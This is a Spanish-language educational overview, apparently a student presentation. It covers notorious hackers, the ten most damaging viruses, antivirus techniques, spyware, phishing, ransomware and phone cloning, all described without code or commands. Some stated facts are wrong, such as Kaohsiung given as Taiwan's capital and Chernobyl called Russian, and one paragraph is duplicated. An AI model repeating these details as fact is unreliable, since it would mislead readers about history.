Al negársele el uso de una computadora mientras estuvo en prisión, Mark Abene se convirtió en un héroe muy popular. Al salir en libertad fue empleado por su amigo Stacy Horn, del BBS denominado ECHO. Las hazañas de Abene le dieron tanta fama, que inspiraron a Michelle Slatalla y Joshua Quittne a escribir un libro titulado "The Gang That Ruled Cyberspace" (La Banda que dominó el Ciberespacio).

-CHEN ING-HOU: 

Es el creador del virus CIH, que lleva sus propias iniciales. Manifiesta que siente mucho por los graves daños causados por su creación viral, pero que ello fue motivado por una venganza en contra de los que llamó "incompetentes desarrolladores de software antivirus". Chen Ing-Hou nació en la ciudad de Kaohsiung, Taipei o Taibei, capital y principal ciudad de Taiwan, y creó su famoso virus en Mayo de 1998, al cual denominó Chernobyl, en conmemoración del 13 aniversario de la tragedia ocurrida en la planta nuclear rusa. Actualmente trabaja como experto en Internet Data Security.

-SIR DYSTIC: 

Es el hacker autor del programa original Back Orifice, lanzado en 1998, da a conocer el lanzamiento de su nueva versión para Windows 2000 y NT. El primer lanzamiento de su sistema Back Orifice fue infectado con el virus CIH y ello dio motivo a que Sir Dystic anunciara que desarrollaría un antivirus denominado CDC Protector y otro que protegería a los sistema de los troyanos, denominado CDC Monitor.

-DAVID L .SMITH: MELISSA 

El macro virus Melissa atacó a miles de usuarios y empresas el 26 de Marzo de 1999 , después de haber sido esparcido como un documento de MS-Word infectado en un grupo de noticias de Usenet , que conformaban una lista de interés sobre páginas web porno. Después de las investigaciones correspondientes se arrestó a su supuesto autor. David L. Smith , de 30 años , natural de Aberdeen , New Jersey y sospechoso de ser el autor del virus Melissa se declaró culpable en segundo grado de daño a computadoras el 09 de Diciembre de 1999. El jurado podría condenarlo a purgar una pena de 10 años en prisión. Inicialmente David L. Smith , programador de computadoras , alegó su inocencia y manifestó que creó el virus en su departamento de Aberdeen y lo llamó así en memoria de una bailarina Topless , del estado de Florida , de la cual se había enamorado , pero sus relaciones sentimentales quedaron frustradas.

-CONTINUACION: 

Inicialmente David L. Smith , programador de computadoras , alegó su inocencia y manifestó que creó el virus en su departamento de Aberdeen y lo llamó así en memoria de una bailarina Topless , del estado de Florida , de la cual se había enamorado , pero sus relaciones sentimentales quedaron frustradas.

-REONEL RAMONES: 

De 27 años, empleado bancario, quien vivía con su hermana y su novia Irene de Guzmán de 23, fueron acusados de ser los autores del virus Love Letter, el mismo que según algunas evidencias, habría empezado como un conjunto de rutinas para penetrar en otros sistemas, con el objeto de sustraer la información de tarjetas de crédito de terceros. Las evidencias apuntaron a Reonel Ramonez, como cabeza del grupo que participó en la creación y difusión de este virus. Una corporación holandesa lo contrató con un sueldo muy atractivo, por considerarlo muy hábil y capaz en el desarrollo de sistemas de seguridad en Redes e Internet.

-VLADIMIR LEVIN: 

Graduado en matemáticas de la Universidad Tecnológica de San Petesburgo, Rusia, fue acusado y preso por la Interpol después de meses de investigación por ser la mente maestra de una serie de fraudes tecnológicos que le permitieron a él y la banda que conformaba, substraer más de 10 millones de dólares, de cuentas corporativas del Citibank. Insiste en la idea de que uno de los abogados contratado para defenderlo es, en verdad, un agente del FBI. A pesar de que la banda substrajo más de 10 millones de dólares al Citibank, Levin fue sentenciado a 3 años de prisión y a pagar la suma de US $ 240,015 a favor del Citibank, ya que las compañías de seguros habían cubierto los montos de las corporaciones agraviadas.

-CONTINUACION: 

Los técnicos tuvieron que mejorar sus sistemas de seguridad contra "crackers" y Vladimir Levin ahora se encuentra en libertad.



El grupo Matrix, también autodenominado MATRIX4EVER (Matrix por siempre) y el grupo Coderz, ambos agrupan a hackers de diferentes nacionalidades y cuyos seudónimos son: ANAkToS de Grecia, Del_Armg0 de Francia, Cell de los Estados Unidos, mort de la república Checa, NBK de Brasil, pointbat de Francia, jackie de Austria, SankeByte de Alemania y ULTRAS de Rusia. NBK es originario de Río de Janeiro, Brasil, y destaca en estos grupos por ser el autor de las librerías Invictus, que el 20 de Octubre del 2001 emitió su versión 2.0 y con la cual se generan gusanos y troyanos que infectan los PE (Portable Executable).

-ROBERT ¨PIMPSHIZ¨ LYTTLE: 

De 18 años de edad, se encuentra bajo arresto domiciliario, por orden de una Corte Juvenil de ciudad Martinez, estado de California, acusado de ser uno de los miembros del grupo Deceptive Duo, que probadamente incursionaron ilegalmente y substrajeron información de los servidores del sistema de la Federal Aviation Administration de los Estados Unidos y descargaron información confidencial relacionada a las filmaciones de las actividades de los pasajeros de los aeropuertos.

-CONTINUACION: 

Al momento de su arresto Lyttle portaba una portátil IBM ThinkPad, un lector de huellas digitales del dedo pulgar y otros sofisticados dispositivos "The Deceptive Duo" (El dúo engañoso) ingresaron a un servidor de la FAA, empleado por la administración de Seguridad de la Aviación Civil de los Estados Unidos, encargada a partir de los fatídicos incidentes del pasado 11 de Septiembre del 2001, del monitoreo de las actividades de los pasajeros en todos los aeropuertos de ese país. Cada sitio web incursionado por estos hackers, mostraba una supuesta "patriótica misión" en la cual preconizaban ser ciudadanos de los Estados Unidos de América, determinados a salvar al país de una "amenaza extranjera" al exponer los huecos de inseguridad en Internet. Incluso incluyeron el logo del grupo, consistente en dos armas de fuego delante de una bandera norteamericana.

-CONTINUACION: 

Cabe mencionar que Robert Lyttle, siendo un joven adolescente, de apenas 14 años formó la corporación SubSeven Software, que desarrolló herramientas tales como el Troyano buscador de puertos Sub-Net, el desinstalador Uninstall it Pro y Define, entre otros y que muchos usuarios consideramos de gran utilidad. Posiblemente se convierta en un héroe del "underground" en el ciber-espacio. En Febrero del 2002 descubrió una vulnerabilidad en el AOL Instant Messenger, y mucho antes hizo lo propio con varios sistemas de Microsoft.

-EL GRAN OSCARIN: 

Hacker español de 27 años, autor del troyano Cabronator, las iniciales son O.L.H y que en los primeros días de Abril del 2003 fue detenido por la Guardia Civil de Española, en un operativo denominado CLON que se inició en Agosto del 2002. Su impresionante ego está casi a la par con sus prolíficas creaciones de todas sus herramientas de hacking y cracking, virus, juegos obscenos, etc.

-TSUTMOTO SHIMOMURA: 

Shimomura buscó lo encontró y desenmascaro a Kevin Mitnick, el cracker/phreaker más famoso de USA, a principios de 1994. Después de que sus colegas del "San Diego Supercomputing Center" le informaron a Shimomura que alguien había robado centenares de programas y los ficheros de su estación de trabajo, el experto en seguridad computacional Tsutomu trabajó en extremo para seguir al ladrón a través del "WELL". Un rastro del "telco labyrinthine" lo condujo eventualmente a un complejo en Raleigh, N.C donde más tarde los agentes de FBI arrestarían a Mitnick en su departamento.

3.4-LOS 10 VIRUS MAS DAÑINOS DE LA HISTORIA:  

CIH (1998) Daño estimado: 20 a 80 millones de dólares, sin contar el precio de la información destruida.



Localización: Desde Taiwan Junio de 1998, CHI es reconocido como uno de los mas peligrosos y destructivos virus jamás vistos. El virus infectó los archivos ejecutables de Windows 95,98 y ME y fué capaz de permanecer residente en memoria de los ordenadores infectados para así infectar otros ejecutables.



¿Porqué?: Lo que lo hizo tan peligroso fué que en poco tiempo afectó muchos ordenadores, podía reescribir datos en el disco duro y dejarlo inoperativo.



Curiosidades: CIH fué distribuido en algun que otro importante software como un Demo del juego de Activision "Sin".

-MELISSA (1999): 

Daño Estimado: 300 a 600 millones de dólares



Localización: Un Miercoles 26 de Marzo de 1999, W97M/Melissa llegó a ser portada de muchos rotativos alrededor del mundo. Una estimación asegura que este script afecto del 15% a 20% de los ordenadores del mundo.



Curiosidades: El virus usó Microsoft Outlook para enviarse asimismo a 50 de los usuarios de la lista de contactos. El mensaje contenía la frase, "Here is that document you asked for...don't show anyone else. ;-)," y venía acompañado por un documento Word adjunto, el cual fue ejecutado por miles de usuarios y permitieron al virus infectar los ordenadores y propagarse a traves de la red.

¨ I LOVE YOU ¨ 

Daño Estimado: 10 a 15 billones de dólares



Localización: Tambien conocido como "Loveletter" y "Love Bug", este fue un script de Visual Basic con un ingenioso y irresistible caramelo: Promesas de amor. Un 3 de Mayo de 2000, el gusano ILOVEYOU fue detectado en HONG KONG y fué transmitido via email con el asunto "ILOVEYOU" y el archivo adjunto, Love-Letter-For-You.TXT.vbs De igual manera a Melissa se transmitio a todos los contactos de Microsoft Outlook.



¿Porqué?: Miles de usuario fueron seducidos por el asunto y clickearon en el adjunto infectado. El virus tambien se tomó la libertad de sobrescribir archivos de musica, imágenes y otros.



Curiosidades: Como Filipinas no tenía leyes que hablaran sobre la escritura de virus el autor de ILOVEYOU quedó sin cargos.

-RED CODE: 

Daño Estimado: 2.6 billones de dólares



Localización: Code Red fue un gusano que infecto ordenadores por primera vez el 13 de Julio de 2001. Fue un virulento bug porque su objetivo era atacar a ordenadores que tuvieran el servidor (IIS) Microsoft's Internet Information Server. El gusano era capaz de explotar una importante vulnerabilidad de este servidor.



Curiosidades: Tambien conocido como "Bady", Code Red fue diseñado para el maximo daño posible. En menos de una semana infectó casi 400.000 servidores y mas de un 1.000.000 en su corta historia.

-SQL SLAMMER: 

Daño Estimado: Como SQL Slammer apareció un sábado su daño ecónomico fue bajo. Sin embargo este atacó 500.000 servidores.



Curiosidades: SQL Slammer, tambien conocido como "Sapphire", data del 25 de Enero de 2003 y su principal objetivo son servidores, el virus era un archivo de 376-byte que generaba una dirección Ip de manera aleatoria y se enviaba asimismoa estas IPs. Si la IP corría bajo un Microsoft's SQL Server Desktop Engine sin parchear podía enviarse de nuevo a otras IPs de manera aleatoria. Slammer infectó 75,000 ordenadores en 10 minutos.

-BLASTER: 

Daño Estimado: 2 a 10 billones de dolares, cientos de miles de ordenadores infectados.



Localización: El verano de 2003 se dió a conocer Blaster tambien llamado "Lovsan" o "MSBlast". El virus se detectó un 11 de Agosto y se propagó rapidamente, en sólo dos días. Transmitio gracias a una vulnerabilidad en Windows 2000 y Windows XP, y cuando era activado abría un cuadro de diálogo en el cual el apagado del sistema era inminente.



Curiosidades: Oculto en el codigo de MSBLAST .EXE había unos curiosos mensajes:



"Solo quiero decir que te quiero san!!" y "billy gates ¿Porqué haces posible esto? para de hacer dinero y arregla tu software!!"

-SABIG. F: 

Daño Estimado: De 5 a 10 billones de dólares y más de un millón de ordenadores infectados.



Localización: Sobig tambien atacó en Agosto de 2003 un horrible mes en materia de seguridad. La variante mas destructiva de este gusano fué Sobig.F, que atacó el 19 de Agosto generando mas de 1 millón de copias de él mismo en las primeras 24 horas. Curiosidades: El virus se propagó vía e-mail adjunto archivos como application.pif y thank_you.pif. Cuando se activaba se transmitía. El 10 de Septiembre de 2003 el virus se desactivó asimismo y ya no resultaba una amenaza, Microsoft ofreció en su día 250.000$ a aquel que identificara a su autor.



-BAGLE: 

Daño Estimado: 10 millones de dólares y subiendo...



Localización: Bagle es un sofisticado gusano que hizó su debut el 18 de Enero de 2004. El código infectaba los sistemas con un mecanismo tradicional, adjuntando archivos a un mail y propagandose el mismo. El peligro real de Bagle es que existen de 60 a 100 variantes de él, cuando el gusano infectaba un ordenador abría un puerto TCP que era usado remotamente por una aplicación para acceder a los datos del sistema.



Curiosidades: La variante Bagle.B fue diseñada para detenerse el 28 de Enero de 2004 pero otras numerosas variantes del virus siguen funcionando.

-MY DOOM: 

Daño Estimado: Realentizo el rendimiento de internet en un 10% y la carga de páginas en un 50%.



Localización: Durante unas pocas horas del 26 de Enero de 2004, MyDoom dió la vuelta al mundo. Era transmitido vía mail enviando un supuesto mensaje de error aunque tambien atacó a carpetas compartidas de usuarios de la red Kazaa.



Curiosidades: MyDoom estaba programado para detenerse despues del 12 de Febrero de 2004

-SASSER: 

Daño Estimado: 10 millones de dólares



Localización: 30 de Abril de 2004 fué su fecha de lanzamiento y fue suficientemente destructivo como para colgar algunas comunicaciones satelites de agencia francesas. Tambien consiguió cancelar vuelos de numeros compañias aéreas.



Curiosidades: Sasser no era transmitido vía mail y no requería usuarios para propagarse. Cada vez que el gusano encontraba sistemas Windows 2000 y Windows Xp no actualizados este era replicado, los sistemas infectados experimentaban una gran inestabilidad.

3.5-VIRUS CURIOSOS:  



CASSINO Uno de los virus más cabroncetes de la historia. El virus se activa los días 15 de enero, 15 de abril y 15 de agosto, mostrando el siguiente mensaje en pantalla: DESTRUCTOR de DISCO. UN RECUERDO DE MALTA ¡Acabo de DESTRUIR la FAT de tu Disco! Sin embargo, tengo una copia en RAM, y voy a darte una última oportunidad de restaurar tus preciosos datos. SI REINICIAS AHORA, TODOS TUS DATOS SE BORRARÁN ¡PARA SIEMPRE!: PELIGRO Tus datos dependen de una partida de JACKPOT CASINO DE MALTE JACKPOT 5 : CREDITOS LLL = Tu Disco ??? = Mi número de teléfono CUALQUIER TECLA PARA JUGAR

-CONTINUACION: 

El virus borraba la FAT, estructura básica de cualquier disco DOS que permite encontrar los datos. Sin embargo, según indicaba en el mensaje, había guardado una copia de seguridad en memoria que el usuario podía recuperar si ganaba la partida. Y entonces daba comienzo una partida de tragaperras en la que nos jugabamos los datos de nuestro disco duro. Si conseguíamos sacar tres “L”, podíamos respirar tranquilos. El virus restauraba los datos y se despedía con el siguiente mensaje: ¡BASTARDO! HAS TENIDO SUERTE ESTA VEZ, PERO POR TU PROPIA SEGURIDAD, ¡APAGA TU ORDENADOR AHORA Y NO LO ENCIENDAS HASTA MAÑANA! Y si no conseguíamos las tres “L”… bueno… digamos que esa será la última partida que jugaremos en ese ordenador.

VIRUS ¨ BARROTES ¨ 

Este es un virus de la vieja escuela. Un auténtico clásico que todos los que tuvieran ordenador antes de 1993 seguro que recordarán. En aquel entonces, este tipo de programas se transmitían a través de diskettes infectados o bien de las primitivas BBS, por lo que normalmente cuando alguien “pillaba” el virus, todos sus amigos solían contagiarse. Su principal vía de propagación era, por tanto, el intercambio de juegos piratas.



Barrotes no era un virus especialmente dañino, pero si muy llamativo. Cuando lo pillabas, enseguida te dabas cuenta. El virus era un pequeño programa que, al entrar en un nuevo sistema, buscaba y escribía su código en los archivos .COM y .EXE de MS-DOS (archivos ejecutables)

. 

Una vez hecha la jugarreta, el virus permanecía en estado latente hasta el 5 de Enero, momento en que se activaba sobreescribiendo el sector de arranque del disco duro.

-CONTINUACION: 

El resultado era que a partir de entonces, cada vez que el usuario utilizara el ordenador, se podian ver unas barras azules verticales, como los barrotes de una cárcel (de ahí el nombre del virus). En pantalla aparecía además la firma de su creador: “Virus BARROTES por OSoft”.

Las siguientes versiones del virus eran más malignas. De esta forma existía Barrotes.1463, que intenta borrar múltiples archivos el día 22 de cada mes, pero que debido a un error de programación, se activaba los días 34 (o sea, nunca). El Barrotes.1303 es la versión más dañina, ya que destruye el sector de arranque del disco duro los días 23 de Septiembre.

3.6-EJEMPLOS DE PROGRAMAS HACKER 

  

En lo que concierne a programas hacker hay una gran variedad de estos programas maliciosos keylogger Sniffers Crakeadores

4-SEGURIDAD:

4.1-METODOS DE PROTECCION  4.2-ANTIVIRUS  4.3-CONSEJOS PARA USUARIOS  4.4-CONSEJOS PARA EMPRESAS 

4.1-METODOS DE PROTECCION: 

ACTIVOS: Son los denominados programas antivirus cuya misión es buscar y destruir al virus causante de la infección



PASIVOS:



Copias de seguridad: Mantener una política de copias de seguridad garantiza la recuperación de los datos y una solución cuando nada de lo anterior ha funcionado. Estudiar: Aprender como es el software de nuestra computadora, buscando y buscando información, en sitios en los que se pueda confiar, sobre software dañino, para así evitarlo. Desconfiar: consiste en utilizar contraseñas





4.2-LOS ANTIVIRUS:¿QUE SON? 

Los antivirus son programas que tratan de detectar, si un objeto informático ejecutable es infectado por un programa Virus.



La mayoría de los antivirus pueden restaurar el archivo infectado a su estado original, aunque no siempre es posible, dado que los virus pueden haber hecho cambios no reversibles.



Los antivirus pueden también borrar los archivos infectados o hacer el virus inofensivo.

4.3-TIPOS DE ANTIVIRUS: 

RESIDENTES: Son los mas comunes y los mas complejos estas continuamente vigilando y analizando



ANALIZADORES BAJO DEMANDA: Utilizan el mismo motor de búsqueda que los residentes se encargan de analizar partes del sistema solamente cuando el usuario lo solicita

4.4-CLASIFICACION DE LOS ANTIVIRUS:          

Clasificación A, por acción: Solo detección Detección y desinfección Detección y aborto de la acción Detección y eliminación del archivo/objeto Clasificación B, por método de detección: Comparación directa Comparación por signatura Comparación de signatura de archivo (detección por comparación con atributos guardados). Por métodos heurísticos

-CONTINUACION:        

Clasificación C, por instante de activación: Invocado por el/la usuario/a Invocado por actividad del sistema (abrir, ejecutar, copiar, guardar archivo) Clasificación D, por Objeto infectado: Sector de Arranque Archivo Ejecutable Macro Virus (Excel, Word) Java

4.5-TECNICAS DE DETECCION DE LOS VIRUS: 

 





A medida que evolucionan las técnicas empleadas por los virus y éstas son investigadas, los programas antivirus incorporan medidas de búsqueda y detección más avanzadas como las siguientes: Búsqueda de Cadenas: Cada uno de los virus contiene en su interior determinadas cadenas de caracteres que le identifican (firmas del virus). Los programas antivirus incorporan un fichero denominado "fichero de firmas de virus" en el que guardan todas estas cadenas, para hacer posible la detección de cualquiera de ellos. Por lo tanto, para detectar un virus, se analizan los ficheros comprobando si alguno de ellos contiene alguna de las cadenas comentadas. Si el fichero analizado no contiene ninguna de ellas, se considera limpio. Si el programa antivirus detecta alguna de esas cadenas en el fichero, indica la posibilidad de que éste se encuentre infectado. En tal caso, se producirá la desinfección

-BUSQUEDA DE EXCEPCIONES: 

Una alternativa en lo que se refiere a la detección de virus, es la búsqueda de excepciones. Cuando un virus utiliza una cadena para realizar una infección, pero en posteriores infecciones emplea otras distintas, es difícil detectarlo. En ese caso lo que el programa antivirus consigue es realizar directamente la búsqueda de un virus en concreto.

-ANALISIS HEURISTICO: 

Cuando no existe información para detectar un posible nuevo virus (que aun no se conoce), se utiliza esta técnica. Con ella se analizan los archivos, obteniendo determinada información (tamaño, fecha y hora de creación, posibilidad de colocarse en memoria,...etc.).



Esta información es contrastada por el programa antivirus con las informaciones que se hayan podido recogen en ocasiones anteriores a cerca de cada uno de los ficheros objeto del análisis.



El antivirus será quien decida si puede tratarse de una infección vírica, o no.

-PROTECCION PERMANENTE: 

La protección permanente vigila constantemente todas aquellas operaciones realizadas en el ordenador que sean susceptibles de permitir una infección por un virus. Si se tiene activada una buena protección, el riesgo de contagio es mínimo, y se facilita enormemente el trabajo con el ordenador, ya que no hay que estar pendiente de analizar todo lo que se recibe: la protección permanente se encarga de ello automáticamente.

-VACUNACION: 

El programa antivirus almacena información sobre cada uno de los archivos. Si se detecta algún cambio entre la información guardada y la información actual, el antivirus avisa de lo ocurrido. Existen dos tipos de vacunaciones:



Interna: la información se guarda dentro del propio archivo analizado. Al ejecutarse, él mismo comprueba si ha sufrido algún cambio.



Externa: la información se guarda en un archivo especial y desde él se contrastan las posibles modificaciones.

5-OTRAS AMENAZAS:  

  

1-SPYWARE 2-VIRUS EN TELEFONOS MOVILES 3-FISHING 4-RAMSONWARE 5-CLONACION DE TELEFONOS M0VILES

4-DEFINICION DE SPYWARE: 

   

El spyware es usado para la sustraccion de informacion personal de un ordenador tales como contraseñas , datos bancarios etc esta sustraccion de lleva de manera secreta es decir que el usuario no es consciente de que se esta sustrallendo informacion sin su consentimiento la unica manera de evitarlo es tener un antivirus que sea capaz de detectar estas amenazas invisibles. Estan divididos en dos ADWARE: SPYWARE: Según su forma de activarse, podemos diferenciar: BHO (Browser Helper Object): Son plugins de los navegadores. Suelen ser cargados al pulsar un enlace de una página maliciosa visitada, y se ejecutarán cada vez que se abra el navegador. Pueden aparecer visibles como barras de herramientas del navegador, o permanecer ocultos mientras realizan una serie de operaciones sin conocimiento del usuario.

-EJEMPLOS DE SPYWARE: 

WebHancer Este programa recaba información de los hábitos del usuario en Internet como URLs visitadas, tamaño de las Webs, tiempo conectado a Internet. Hay que proceder con cuidado en su desinstalación.



Mattel Broadcast Busquen un archivo llamado DSSAgent.exe y bórrenlo. Es el responsable de la publicidad no deseada de la firma de juguetes infantiles Mattel.



HotBar HotBar recoge información acerca de las Webs que visitamos y la información que solicitamos en buscadores. HotBar recoge la IP y las URL que visitamos y las envía a su servidor para elaborar perfiles estadísticos de los hábitos de los internautas. Incluso ZDNet le concedió un premio 5 estrellas (5-Stars) a este spyware, lo cual no deja de ser sorprendente.

4-COMO PREVENIR EL SPYWARE:  

   

No hacer clic en vínculos que aparezcan en ventanas de mensajes emergentes Escoger la opción “No” cuando aparezcan preguntas no deseadas. Se debe ser cuidadoso cuando algunos cuadros de diálogo tienen la leyenda de si se desea ejecutar un programa o realizar otro tipo de tarea Ser cuidadoso al descargar software gratuito No hacer clic en vínculos contenidos en correos electrónicos que ofrezcan software anti-spyware. Ejecutar un navegador de Web que permita el bloqueo de ventanas de mensajes emergentes y cookies. Utilizar un navegador alterno a Internet Explorer. La mayoría del spyware toma ventajas de las vulnerabilidades de seguridad en el navegador de Web Internet Explorer,

5.2-VIRUS EN TELEFONOS MOVILES: 

Esta es la nueva amenaza a la que nos enfrentamos los millones de usuarios de telefonos moviles es una nueva forma de ataque que ya no es exclusiva de los ordenadores y que muy pronto podria tener la misma magnitud que tienen actualmente los virus de ordenador. Esta amenaza actua oculta una vez que se a instalado en el telefono movil y generalmente en terminales que tienen MMS o bluetooth

-PROPAGACION Y ACTUACION: 

Hasta ahora, se sabe que este tipo de virus pueden propagarse de dos maneras distintas:



Por MMS: Se recibe un mensaje con una aplicación adjunta invitándole a instalarla.



Por Bluetooth: Aparece un mensaje en pantalla pidiendo su confirmación para instalar una nueva aplicación.



En ambos casos la aplicación puede tratarse de un virus, y sólo si se acepta la instalación, su teléfono será infectado.

5.3-EL PHISHING: 

El "phishing" es una modalidad de estafa diseñada con la finalidad de robarle la identidad. El delito consiste en obtener información tal como números de tarjetas de crédito, contraseñas, información de cuentas u otros datos personales por medio de engaños. Este tipo de fraude se recibe habitualmente a través de mensajes de correo electrónico, sitios web, llamadas telefónicas u otras vías de comunicación de compañías legítimas.

-COMO ACTUA EL PHISHING: 

En esta modalidad de fraude, el usuario malintencionado envía millones de mensajes falsos que parecen provenir de sitios Web reconocidos o de su confianza, como su banco o la empresa de su tarjeta de crédito.



Dado que los mensajes y los sitios Web que envían estos usuarios parecen oficiales, logran engañar a muchas personas haciéndoles creer que son legítimos. La gente confiada normalmente responde a estas solicitudes de correo electrónico con sus números de tarjeta de crédito, contraseñas, información de cuentas u otros datos personales.

-CONTINUACION: 

Para que estos mensajes parezcan aun más reales, el estafador suele incluir un vínculo falso que parece dirigir al sitio Web legítimo, pero en realidad lleva a un sitio falso o incluso a una ventana emergente que tiene exactamente el mismo aspecto que el sitio Web oficial. Estas copias se denominan "sitios Web piratas".



Una vez que el usuario está en uno de estos sitios Web, introduce información personal sin saber que se transmitirá directamente al delincuente, que la utilizará para realizar compras, solicitar una nueva tarjeta de crédito o robar su identidad.

5.4-RAMSONWARE: 

Esta tecnica ha vuelto a sugir en internet consiste en un tipo de viru que pro asi decirlo nos secuestra los archivos encriptandolos y adjunta un mensaje en el que se nos pide una cantidad de dinero si se quieren recuperar esos datos ademas se adjunta una cuenta bancaria una vez pagada la cantidad reclamada se nos facilita una clave para desencriptar los archivo esta es una manera de estafa

4-CLONACION DE TELEFONOS MOVILES: 

Esta tecnica es de reciente apararicion consiste en hacer una copia ilegal del telefono todo empieza cuando una persona realiza una llamada envia al aire un espectroradioelectrico que contiene el S.I.N que es una numeracion unica (Sistem Identication Number) dicha numeracion es usada por la compañía para hacer la tarificacion del telefono para escanear dicha señal se usan equipos que escanean el aire en busca de esta señal y asi pueden identificar el S .I .N lo toman lo instalan y se lo configuran a otro telefono movil de tal forma que entonces asi existiran dos telefonos con la misma identificacion de tal forma que cuando llamen al dueño del telefono tambien sonara el telefono clonado pero la estafa se realiza cuando el usuario del telefono clonado realiza una llamada ya que la tarificaion de esas llamadas se las pasan al otro usuario sin que este de entere aunque las compañias estan incorporando sistemas que detectan estos fraudes informaticos ya que lo que se hace en caso de que el sistema que controla la identificacion de los telefonos detecte dos telefonos con la misma identificacion dicho sistema procede a la anulacion de la ultima identificacion entrante

Related Documents

Los Virus
May 2020 17
Los Virus Espirituales
November 2019 14
Los Virus Sandra
June 2020 5
Los Virus Cos 2
November 2019 15
Danos De Los Virus
July 2020 14
Los Virus Cos
June 2020 3